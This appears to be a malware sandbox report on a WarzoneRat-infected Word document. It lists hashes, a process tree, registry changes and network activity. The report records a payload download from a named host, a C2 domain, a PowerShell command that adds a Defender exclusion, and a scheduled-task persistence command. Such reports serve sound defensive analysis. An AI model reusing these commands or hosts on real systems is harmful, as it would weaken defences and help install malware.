warzonerat | 284f55fed83bb6e37858ff016660423600caadf375aa5ed8333c418bc6a03d36 | Triage

Analysis

max time kernel
114s
max time network
142s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
15/02/2023, 23:28 UTC

Sharing

Report Analysis Logs

General

Target

PURCHASE ORDER.doc
Size

78KB
MD5

64559d83eb87d528a109b1e3a067bb9a
SHA1

4711cd71b583f87548d699c14e8a39a595b7a70b
SHA256

284f55fed83bb6e37858ff016660423600caadf375aa5ed8333c418bc6a03d36
SHA512

c887bda5ca7d62c1586dd8454b1a5e56c4e156329b99104e4db38b4b54b37c4931a2da8838a6ffb9c1c1798f1e1f6f4eda951a691c768868825a04587b7502b8
SSDEEP

1536:lZlUideVtGei5nvxHySvPlVFd5pw7WpNY3q38iVTt:lZlUIuSvxzPlVwap4Wd

Score

10^/10

warzonerat infostealer rat

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1512	1316	cmd.exe	27

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
632	hey.txt
780	hey.txt

Loads dropped DLL 2 IoCs

pid	Process
1512	cmd.exe
632	hey.txt

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 632 set thread context of 780	632	hey.txt	37

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task

pid	Process
1068	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1316	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
632	hey.txt
632	hey.txt
2016	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	632	hey.txt
Token: SeDebugPrivilege	2016	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1316	WINWORD.EXE
1316	WINWORD.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1316 wrote to memory of 1512	1316	WINWORD.EXE	30
PID 1316 wrote to memory of 1512	1316	WINWORD.EXE	30
PID 1316 wrote to memory of 1512	1316	WINWORD.EXE	30
PID 1316 wrote to memory of 1512	1316	WINWORD.EXE	30
PID 1512 wrote to memory of 632	1512	cmd.exe	32
PID 1512 wrote to memory of 632	1512	cmd.exe	32
PID 1512 wrote to memory of 632	1512	cmd.exe	32
PID 1512 wrote to memory of 632	1512	cmd.exe	32
PID 632 wrote to memory of 2016	632	hey.txt	33
PID 632 wrote to memory of 2016	632	hey.txt	33
PID 632 wrote to memory of 2016	632	hey.txt	33
PID 632 wrote to memory of 2016	632	hey.txt	33
PID 632 wrote to memory of 1068	632	hey.txt	35
PID 632 wrote to memory of 1068	632	hey.txt	35
PID 632 wrote to memory of 1068	632	hey.txt	35
PID 632 wrote to memory of 1068	632	hey.txt	35
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37
PID 632 wrote to memory of 780	632	hey.txt	37

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1316
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k hey.txt
  2⤵
  - Process spawned unexpected child process
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Users\Admin\AppData\Local\Temp\hey.txt
    hey.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ZooUzERsvsgBLT.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2016
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZooUzERsvsgBLT" /XML "C:\Users\Admin\AppData\Local\Temp\tmpEF30.tmp"
      4⤵
      Creates scheduled task(s)
      PID:1068
  - - C:\Users\Admin\AppData\Local\Temp\hey.txt
      "C:\Users\Admin\AppData\Local\Temp\hey.txt"
      4⤵
      Executes dropped EXE
      PID:780

Network

DNS

okokokokokok.khaby.lol

WINWORD.EXE

Remote address:

8.8.8.8:53

Request

okokokokokok.khaby.lol

IN A

Response

okokokokokok.khaby.lol

IN A

45.148.121.24
GET

http://okokokokokok.khaby.lol/ME.exe

WINWORD.EXE

Remote address:

45.148.121.24:80

Request

GET /ME.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: okokokokokok.khaby.lol
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 15 Feb 2023 23:28:47 GMT
Server: Apache
Last-Modified: Wed, 15 Feb 2023 09:33:49 GMT
Accept-Ranges: bytes
Content-Length: 901120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
DNS

work2020.ddns.net

hey.txt

Remote address:

8.8.8.8:53

Request

work2020.ddns.net

IN A

Response

work2020.ddns.net

IN A

91.193.75.131

45.148.121.24:80

http://okokokokokok.khaby.lol/ME.exe

http

WINWORD.EXE

16.4kB
928.2kB
349
669

HTTP Request

GET http://okokokokokok.khaby.lol/ME.exe

HTTP Response

200
91.193.75.131:1690

work2020.ddns.net

hey.txt

746 B
420 B
7
9

8.8.8.8:53

okokokokokok.khaby.lol

dns

WINWORD.EXE

68 B
84 B
1
1

DNS Request

okokokokokok.khaby.lol

DNS Response

45.148.121.24
8.8.8.8:53

work2020.ddns.net

dns

hey.txt

63 B
79 B
1
1

DNS Request

work2020.ddns.net

DNS Response

91.193.75.131

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hey.txt

Filesize
880KB

MD5
69c7f6716fd29e8e9a2bd06b462ca6ff

SHA1
e79da5de5e4c8335eeb63102d1bd6e0d64630f8b

SHA256
8e4be4419065e5426c553601aa55c2565c4a2c893799f7e9f4ad3b1061915bbb

SHA512
8851e4a7634d8b716b2b7dbd910715abd8a951213c584b3b4f26ac1b70fb401272eeac3eca5f232ec58be35756a3258e429317d2d71d1b421211a7764ec2b8b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\hey.txt

Filesize
880KB

MD5
69c7f6716fd29e8e9a2bd06b462ca6ff

SHA1
e79da5de5e4c8335eeb63102d1bd6e0d64630f8b

SHA256
8e4be4419065e5426c553601aa55c2565c4a2c893799f7e9f4ad3b1061915bbb

SHA512
8851e4a7634d8b716b2b7dbd910715abd8a951213c584b3b4f26ac1b70fb401272eeac3eca5f232ec58be35756a3258e429317d2d71d1b421211a7764ec2b8b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\hey.txt

Filesize
880KB

MD5
69c7f6716fd29e8e9a2bd06b462ca6ff

SHA1
e79da5de5e4c8335eeb63102d1bd6e0d64630f8b

SHA256
8e4be4419065e5426c553601aa55c2565c4a2c893799f7e9f4ad3b1061915bbb

SHA512
8851e4a7634d8b716b2b7dbd910715abd8a951213c584b3b4f26ac1b70fb401272eeac3eca5f232ec58be35756a3258e429317d2d71d1b421211a7764ec2b8b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEF30.tmp

Filesize
1KB

MD5
171d8da52a3288a68e939ff891d3397d

SHA1
aa6a18b74c8f5b90ed582ff97bb97810aee42f0a

SHA256
6f0cd1fdf32a95482002fde7b8e5ca1525646fd13e115a94dc9f9b1c96f790a9

SHA512
e0e07b412a5b82656988f7e0e3ca8aaa9054683791ae98085e476488ce91813ee1d7ec01bc31feb304c7535f0aa3f2f408325cd1cd03020e8dda7336ab00a022

Download Submit
\Users\Admin\AppData\Local\Temp\hey.txt

Filesize
880KB

MD5
69c7f6716fd29e8e9a2bd06b462ca6ff

SHA1
e79da5de5e4c8335eeb63102d1bd6e0d64630f8b

SHA256
8e4be4419065e5426c553601aa55c2565c4a2c893799f7e9f4ad3b1061915bbb

SHA512
8851e4a7634d8b716b2b7dbd910715abd8a951213c584b3b4f26ac1b70fb401272eeac3eca5f232ec58be35756a3258e429317d2d71d1b421211a7764ec2b8b0

Download Submit
\Users\Admin\AppData\Local\Temp\hey.txt

Filesize
880KB

MD5
69c7f6716fd29e8e9a2bd06b462ca6ff

SHA1
e79da5de5e4c8335eeb63102d1bd6e0d64630f8b

SHA256
8e4be4419065e5426c553601aa55c2565c4a2c893799f7e9f4ad3b1061915bbb

SHA512
8851e4a7634d8b716b2b7dbd910715abd8a951213c584b3b4f26ac1b70fb401272eeac3eca5f232ec58be35756a3258e429317d2d71d1b421211a7764ec2b8b0

Download Submit
memory/632-67-0x0000000000930000-0x000000000093C000-memory.dmp

Filesize
48KB

Download
memory/632-73-0x0000000004CF0000-0x0000000004D1C000-memory.dmp

Filesize
176KB

Download
memory/632-68-0x0000000005CB0000-0x0000000005D28000-memory.dmp

Filesize
480KB

Download
memory/632-64-0x00000000013A0000-0x0000000001482000-memory.dmp

Filesize
904KB

Download
memory/632-66-0x0000000000910000-0x0000000000924000-memory.dmp

Filesize
80KB

Download
memory/780-86-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-83-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-93-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-91-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-85-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-75-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-76-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-78-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-80-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/780-81-0x0000000000400000-0x000000000055C000-memory.dmp

Filesize
1.4MB

Download
memory/1316-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1316-58-0x00000000714AD000-0x00000000714B8000-memory.dmp

Filesize
44KB

Download
memory/1316-55-0x00000000704C1000-0x00000000704C3000-memory.dmp

Filesize
8KB

Download
memory/1316-54-0x0000000072A41000-0x0000000072A44000-memory.dmp

Filesize
12KB

Download
memory/1316-57-0x0000000075531000-0x0000000075533000-memory.dmp

Filesize
8KB

Download
memory/1316-95-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1316-96-0x00000000714AD000-0x00000000714B8000-memory.dmp

Filesize
44KB

Download
memory/2016-92-0x00000000657C0000-0x0000000065D6B000-memory.dmp

Filesize
5.7MB

Download
memory/2016-94-0x00000000657C0000-0x0000000065D6B000-memory.dmp

Filesize
5.7MB

Download